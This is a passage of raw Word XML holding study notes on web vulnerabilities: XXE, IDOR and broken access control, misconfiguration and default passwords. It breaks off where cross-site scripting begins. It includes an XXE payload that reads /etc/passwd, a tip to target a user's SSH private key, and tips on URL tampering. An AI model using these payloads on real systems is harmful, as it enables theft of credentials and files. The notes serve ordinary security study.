        <w:t>!DOCTYPE – defines root element of the document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320631D7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>!ELEMENT &lt;insert&gt; – defines the note element must contain the elements “to, from, heading, body”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B2CFCF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To – defines to element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DB15B7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>From – defines the from element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDCB4F8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Heading – defines the heading element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11175D5F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Body – defines the body element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4865BFBB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>!ENTITY – defines new entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027947F2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>#PCDATA – parseable character data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C9CEAF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>XML External Entity – XXE Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360AB2CB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Define ENTITY called name and assign a value to use in code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5379EE75" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Use XXE to read system file by defining ENTITY and using SYSTEM keyword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BDD31A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Define an ENTITY named read with value set to SYSTEM and path of file (such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>file:///etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F512ED">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185842B2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>A website vulnerable to XXE would display content of file /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D036DA0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>EX code – changes name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57914720" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>&lt;!DOCTYPE replace [&lt;!ENTITY name "feast"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6272B5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> &lt;userInfo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD79307" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">  &lt;firstName&gt;falcon&lt;/firstName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B301E08" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">  &lt;lastName&gt;&amp;name;&lt;/lastName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFCCC02" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> &lt;/userInfo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302B3DEC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>EX code – displays /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F34E5F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>&lt;?xml version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62123880" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>&lt;!DOCTYPE root [&lt;!ENTITY read SYSTEM 'file:///etc/passwd'&gt;]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E63DC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>&lt;root&gt;&amp;read;&lt;/root&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7319D532" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>EXM External Entity – Exploiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4114DD1E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Pair with Burp when submitting XXE attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5873AEC6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Swap /etc/passwd for /home/falcon/ .ssh/id_rsa to search for ssh keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6904CAD4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E60C3E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If  a websites visitor is able to access the protected page/pages not authorized to view, access controls are broken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F708F93" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Application uses unverified data in SQL call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C40C75B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. Pstmt.setString(1, request.getParamter(“acct”));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2CB670" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. ResultSet results = pstmt.executeQuery();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5FD25B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Modify acct parameter in the browser to query any account number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7915EDEF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Force browse to target URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5955D3D9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId65" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://example.com/app/getappInfo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CAD0692" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId66" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://example.com/app/admin_getappInfo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="24E1E79B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Broken Access Control (IDOR Challenge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097EF39D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Insecure Direct Object Reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66547A64" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploiting a misconfiguration in the way user input is handled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E83C8C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Flag=&lt;num&gt; after .php in website URL following account login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5567A81E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A957E6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Poorly configured permissions on cloud services, unnecessary features enabled, default accounts with unchanged passwords, overly detailed error messages, no HTTP security headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9DD397" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Default Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CB3B2C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Common in embedded and IoT devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A9CF70" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Check official documentation, OSINT-style (google)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3487EE54" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Cross-site Scripting</w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCEE2E8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>XSS Explained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E3C8AD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
